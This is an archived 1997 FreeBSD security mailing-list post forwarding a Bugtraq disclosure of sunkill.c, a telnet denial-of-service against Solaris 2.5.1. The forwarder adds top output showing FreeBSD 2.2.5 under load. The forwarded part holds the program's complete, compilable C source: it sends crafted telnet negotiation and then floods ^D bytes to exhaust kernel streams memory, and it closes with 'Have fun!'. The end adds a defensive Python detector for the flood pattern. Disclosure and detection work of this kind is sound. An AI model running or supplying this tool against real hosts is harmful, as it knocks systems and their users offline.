Date:      Sun, 14 Dec 1997 22:52:52 -0800 (PST)
From:      Jan Koum <jkb@best.com>
To:        freebsd-security@freebsd.org
Subject:   To kill a sun: (fwd)
Message-ID:  <Pine.BSF.3.96.971214223836.1241A-100000@shell6.ba.best.com>


	Hi all,

	I tried this against my 2.2.5-RELEASE machine which is on the
ethernet with another FreeBSD (3.0-CURRENT) machine. The 2.2.5 one is usually
doing nothing but running an rc5-64 client (Go team FreeBSD Japan!). Here
is what top showed:

last pid: 20938;  load averages:  2.04,  1.65,  1.30		22:42:21
16 processes:  3 running, 13 sleeping
CPU states: 81.5% user,  0.0% nice,  5.0% system, 13.5% interrupt,  0.0% idle
Mem: 13M Active, 1152K Inact, 7564K Wired, 7624K Cache, 3606K Buf, 1896K Free
Swap: 128M Total, 96K Used, 128M Free

  PID USERNAME PRI NICE SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 3616 jkb      53 -20   824K   316K RUN    222.7H 68.89% 68.89% rc564
20923 root     63   0   192K   616K RUN      1:21 27.35% 27.35% telnetd
						  ^^^^^^^^^^^^^
16129 root      2   0   492K   720K select  15:33  1.45%  1.45% ppp
20932 jkb      29   0   600K   796K RUN      0:01  0.04%  0.04% top
  134 root     18   0   332K   416K pause    0:46  0.00%  0.00% cron
  171 jkb      18   4   452K   284K pause    0:00  0.00%  0.00% csh


	Usually the load is at 1.00 since I have rc564 running with
priority of -20. But this time it was 2.xx -- I guess telnetd doubled it
this time. Running this against 3.0-CURRENT (from a week ago or so) wasn't
as horrible and showed this:

last pid:  4861;  load averages:  0.18,  0.65,  0.48 		22:45:12
39 processes:  2 running, 37 sleeping
CPU states: 23.3% user,  0.0% nice,  3.9% system,  1.6% interrupt, 71.2% idle
Mem: 19M Active, 21M Inact, 11M Wired, 9384K Cache, 4942K Buf, 828K Free
Swap: 256M Total, 84M Used, 172M Free, 33% Inuse

  PID USERNAME PRI NICE  SIZE    RES STATE    TIME   WCPU    CPU COMMAND
 2894 jkb        2   0 40228K 14716K RUN    121:26  7.21%  7.21% netscape
 2867 jkb        2   0 19156K 15788K select  37:14  4.46%  4.46% Xaccel
 4855 root       2   0   204K   432K sbwait   0:00  2.22%  1.83% telnetd
						    ^^^^^^^^^^^^
 4858 jkb       28   0   820K   636K RUN      0:00  0.82%  0.61% top
 2868 jkb        2   0   436K   456K select   0:23  0.15%  0.15% afterstep
 3165 jkb        2   0   708K   344K select   0:01  0.08%  0.08% ssh


	Does that mean that 2.2.5 is vulnerable to a little DoS? I am
comparing it to 3.0 which handles it with a lot of grace.

-- Yan

---------- Forwarded message ----------
Date: Sat, 13 Dec 1997 15:48:51 -0500
From: Jason Zapman II <zapman@CC.GATECH.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: To kill a sun:

This is sunkill.c

It affects at least Solaris 2.5.1 machines, both sun4c and sun4m
architectures.  I imagine it affects all Solaris 2.5.1 machines, both SPARC
and x86, but I'm not sure.  It basically works by opening a telnet
connection to the victim machine and sending a few bad telnet negotiation
options, then flooding the port with lots of ^D characters.  This uses all
the streams memory (I think) on the victim's machine and causes the kernel
to get very angry.  The machine crawls to a halt, the cursor in X stops
moving, the machine is unresponsive to the network.  It's a bad situation
all around.

/*
**  To make, if your system is BSD'ish:  gcc <thisfile>
**       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
**
**  Usage: a.out <victim's hostname>
**
**  Have fun!
*/

#include <stdio.h>      /* printf */
#include <stdlib.h>     /* exit */
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/telnet.h>
#include <string.h>
#include <strings.h>    /* bzero, bcopy */
#include <unistd.h>

#define BUFSIZE 100
#define DOTS

/* SIGPIPE arrives when the peer closes the connection while we are still writing. */
void catchit(int sig)
{
    (void)sig;
    printf("\nCaught SIGPIPE -- your link may be too slow.\n");
    exit(1);
}

int main(int argc, char *argv[])
{
    /* Telnet option negotiation sent before the flood: refuse TTYPE, XDISPLOC,
       NAWS and both ENVIRON options, ask the server for SGA and ECHO. */
    unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
    TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
    TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

    unsigned char nastybuf[BUFSIZE];
    struct sockaddr_in sin;
    struct servent *sp;
    struct hostent *hp;
    int s;

    if (argc < 2) {
        printf("usage: %s <hostname>\n", argv[0]);
        exit(1);
    }

    signal(SIGPIPE, catchit);

    memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

    /* socket() returns -1 on failure, not 0 */
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
          printf("no socket\n");
          exit(1);
    }

    if (!(hp = gethostbyname(argv[1]))) {
        printf("unknown host\n");
        exit(1);
    }

    bzero(&sin,sizeof(sin));
    bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
    sin.sin_family = AF_INET;
    if (!(sp = getservbyname("telnet","tcp"))) {
        printf("no telnet service entry\n");
        exit(1);
    }
    sin.sin_port = sp->s_port;

    if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
        printf("can't connect to host\n");
        exit(1);
    }

    printf("connected to %s\n",argv[1]);
    write(s,kludge_telopt,sizeof(kludge_telopt));   /* kludge some telnet negotiation */

    /*  "Let them eat ^Ds..." */

    while (write(s,nastybuf,BUFSIZE) != -1) {

#ifdef DOTS
        write(STDOUT_FILENO,".",1);
#endif
    }
    return 0;
}

Jason

--
     Jason Price    |     If you want to build a ship, don't drum up people
      Theta Xi,     |   together to collect wood and don't assign them tasks
   Beta, Alpha 449  | and work, but rather teach them to long for the endless
 jprice@poboxes.com |    immensity of the sea. -- Antoine de Saint Exupery
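As an added defender-side example (not part of the original mail or of sunkill.c), the following Python decodes the telnet option negotiation the forwarded program sends and flags a session whose remaining payload is almost entirely ^D, which is the pattern the forwarded message describes. The captured byte strings are constructed here, and the 64-byte minimum and 0.9 ratio are arbitrary thresholds chosen for the example.

```python
# Constructed example for this thread: decode the telnet option negotiation the
# forwarded program sends, then flag a stream whose remaining payload is almost
# entirely ^D (0x04). Byte values are the RFC 854/855 constants from <arpa/telnet.h>.
IAC, DO, DONT, WILL, WONT = 255, 253, 254, 251, 252
VERB = {DO: "DO", DONT: "DONT", WILL: "WILL", WONT: "WONT"}
TELOPT = {1: "ECHO", 3: "SGA", 24: "TTYPE", 31: "NAWS", 35: "XDISPLOC",
          36: "OLD-ENVIRON", 39: "NEW-ENVIRON"}


def decode_negotiation(data: bytes):
    """Split a client-to-server telnet stream into (commands, payload).

    commands: list of strings such as 'WONT TTYPE'; payload: bytes that were
    not part of any IAC sequence (an escaped IAC IAC yields one 0xFF byte)."""
    cmds, payload, i = [], bytearray(), 0
    while i < len(data):
        if data[i] != IAC:
            payload.append(data[i])
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:
            payload.append(IAC)          # escaped data byte 0xFF
            i += 2
        elif i + 2 < len(data) and data[i + 1] in VERB:
            opt = data[i + 2]
            cmds.append(f"{VERB[data[i + 1]]} {TELOPT.get(opt, str(opt))}")
            i += 3
        elif i + 1 < len(data):
            cmds.append(f"CMD {data[i + 1]}")   # option-less command (NOP, AYT, ...)
            i += 2
        else:
            break                        # lone IAC at end of stream: truncated
    return cmds, bytes(payload)


def looks_like_eof_flood(payload: bytes, min_len: int = 64, ratio: float = 0.9) -> bool:
    """True when the payload is long and consists almost entirely of ^D bytes."""
    return len(payload) >= min_len and payload.count(4) / len(payload) >= ratio


# The 21 negotiation bytes from the forwarded program, written as raw values.
KLUDGE = bytes([IAC, WONT, 24, IAC, DO, 3, IAC, WONT, 35, IAC, WONT, 31,
                IAC, WONT, 36, IAC, WONT, 39, IAC, DO, 1])
FLOOD = KLUDGE + b"\x04" * 100    # constructed capture: negotiation, then ^D flood
BENIGN = KLUDGE + b"ls -l\r\n"    # constructed capture: negotiation, then a command

if __name__ == "__main__":
    for name, stream in (("flood", FLOOD), ("benign", BENIGN)):
        cmds, rest = decode_negotiation(stream)
        print(name, cmds, "flood" if looks_like_eof_flood(rest) else "ok")
```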
